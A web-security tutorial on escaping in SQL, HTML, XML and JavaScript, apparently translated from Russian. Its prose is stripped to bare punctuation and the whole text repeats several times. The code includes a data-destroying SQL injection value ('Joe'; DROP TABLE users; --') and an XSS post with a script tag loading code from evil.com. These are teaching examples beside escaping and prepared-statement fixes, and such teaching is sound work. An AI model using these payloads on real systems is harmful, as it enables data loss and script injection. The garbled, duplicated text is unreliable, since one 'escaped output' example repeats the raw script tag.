var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
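<!-- Output of the escaped template: htmlspecialchars() replaced <, >, and " with entities, so the
     browser shows the script tag as literal text and no script element exists. (The page had
     rendered the entities back into raw markup, which made this indistinguishable from the
     vulnerable output above.) -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>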
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
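// Prepared statement: the SQL text with a placeholder is sent first and the value is bound
// separately, so the database never parses user input as SQL. PDOStatement::execute() takes an
// array of parameter values, one per placeholder; passing the bare string is a wrong call.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);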
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <!-- Not well-formed as written: the raw "<" inside <contents> starts a tag, so a parser rejects the document. It must be written as &lt; (and ">" conventionally as &gt;). --> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
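<!-- Output of the escaped template: htmlspecialchars() replaced <, >, and " with entities, so the
     browser shows the script tag as literal text and no script element exists. (The page had
     rendered the entities back into raw markup, which made this indistinguishable from the
     vulnerable output above.) -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>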
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
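// Prepared statement: the SQL text with a placeholder is sent first and the value is bound
// separately, so the database never parses user input as SQL. PDOStatement::execute() takes an
// array of parameter values, one per placeholder; passing the bare string is a wrong call.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);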
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <!-- Not well-formed as written: the raw "<" inside <contents> starts a tag, so a parser rejects the document. It must be written as &lt; (and ">" conventionally as &gt;). --> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
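<!-- Output of the escaped template: htmlspecialchars() replaced <, >, and " with entities, so the
     browser shows the script tag as literal text and no script element exists. (The page had
     rendered the entities back into raw markup, which made this indistinguishable from the
     vulnerable output above.) -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>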
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
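// Prepared statement: the SQL text with a placeholder is sent first and the value is bound
// separately, so the database never parses user input as SQL. PDOStatement::execute() takes an
// array of parameter values, one per placeholder; passing the bare string is a wrong call.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);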
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <!-- Not well-formed as written: the raw "<" inside <contents> starts a tag, so a parser rejects the document. It must be written as &lt; (and ">" conventionally as &gt;). --> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
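<!-- Output of the escaped template: htmlspecialchars() replaced <, >, and " with entities, so the
     browser shows the script tag as literal text and no script element exists. (The page had
     rendered the entities back into raw markup, which made this indistinguishable from the
     vulnerable output above.) -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>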
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
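// Prepared statement: the SQL text with a placeholder is sent first and the value is bound
// separately, so the database never parses user input as SQL. PDOStatement::execute() takes an
// array of parameter values, one per placeholder; passing the bare string is a wrong call.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);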
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <!-- Not well-formed as written: the raw "<" inside <contents> starts a tag, so a parser rejects the document. It must be written as &lt; (and ">" conventionally as &gt;). --> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
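<!-- Output of the escaped template: htmlspecialchars() replaced <, >, and " with entities, so the
     browser shows the script tag as literal text and no script element exists. (The page had
     rendered the entities back into raw markup, which made this indistinguishable from the
     vulnerable output above.) -->
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt; </p> </div>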
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
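// Prepared statement: the SQL text with a placeholder is sent first and the value is bound
// separately, so the database never parses user input as SQL. PDOStatement::execute() takes an
// array of parameter values, one per placeholder; passing the bare string is a wrong call.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute([$_POST['name']]);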
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <!-- Not well-formed as written: the raw "<" inside <contents> starts a tag, so a parser rejects the document. It must be written as &lt; (and ">" conventionally as &gt;). --> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
// The same author and contents text as the XML example, held as plain JS
// string literals; the two bindings are independent, so contents comes first here.
var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
var name = "Homo Sapiens";
- " " . :
// Author and contents as JS string literals; the "<" and ">" inside the
// double-quoted literal are ordinary characters, unlike in XML text.
var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
var name = "Homo Sapiens";
! ! , , , -?
// Deliberately ill-formed: the unescaped inner double quote ends the string
// literal after `said `, so this line is a syntax error rather than a program.
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
// The inner quotes are backslash-escaped so they are data inside the literal
// instead of its delimiters; the two bindings are independent.
var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
var name = "Homo Sapiens";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
// One fixed query: the name is a constant in the SQL text itself, so nothing
// outside the program can influence the statement that is sent.
$query = sprintf("SELECT phone_number FROM users WHERE name = '%s'", 'Alex');
$result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
// Negative example: the submitted value is spliced verbatim into the SQL text,
// so any quote character in it changes the statement's structure.
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php /* negative example: the stored value is echoed raw, so any markup in it is interpreted by the browser */ echo $post['username']; ?> on <?php /* program-formatted timestamp, not user text */ echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php /* negative example: raw, unescaped value reaches the browser */ echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
// Quote-aware escaping of the submitted name before it is interpolated into the
// query text. mysql_real_escape_string() only protects a value that sits inside
// a quoted SQL string literal, as it does here, and it escapes according to the
// charset of the open connection; the ext/mysql functions are no longer shipped
// with current PHP, so this is the legacy form of the idea.
$name = mysql_real_escape_string($_POST['name']);
$query = sprintf("SELECT phone_number FROM users WHERE name = '%s'", $name);
$result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
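<div class="post">
  <p class="meta">
    Posted by <?php
      // User-supplied text lands in an HTML text node, so "<", ">" and "&" must
      // not reach the browser as markup. Flags and charset are passed explicitly
      // instead of relying on the running PHP version's defaults; ENT_QUOTES also
      // neutralises both quote characters, which matters the moment a value is
      // reused inside an attribute.
      echo htmlspecialchars($post['username'], ENT_QUOTES, 'UTF-8');
    ?> on <?php
      // date() formats a timestamp with a fixed pattern, so this output is
      // program-generated, not user text (assumes $post['date'] is a Unix
      // timestamp — TODO confirm against the caller).
      echo date('F j, H:i', $post['date']);
    ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body'], ENT_QUOTES, 'UTF-8'); ?>
  </p>
</div>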
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
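// The SQL text is fixed before any user data is seen; the driver binds the
// placeholder value separately, so it can never change the statement's structure.
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// PDOStatement::execute() takes the bound values as an array (one entry per "?"),
// not a bare string; passing the string directly is a type error.
$stmt->execute([$_POST['name']]);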
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
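<?xml version="1.0" encoding="UTF-8" ?>
<!-- In element text a raw "<" starts a tag and "&" starts an entity reference,
     so the comparison signs are written as the predefined entities; a parser
     hands them back to the application as the literal characters. -->
<article>
  <author>Homo Sapiens</author>
  <contents> Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y. </contents>
</article>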
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
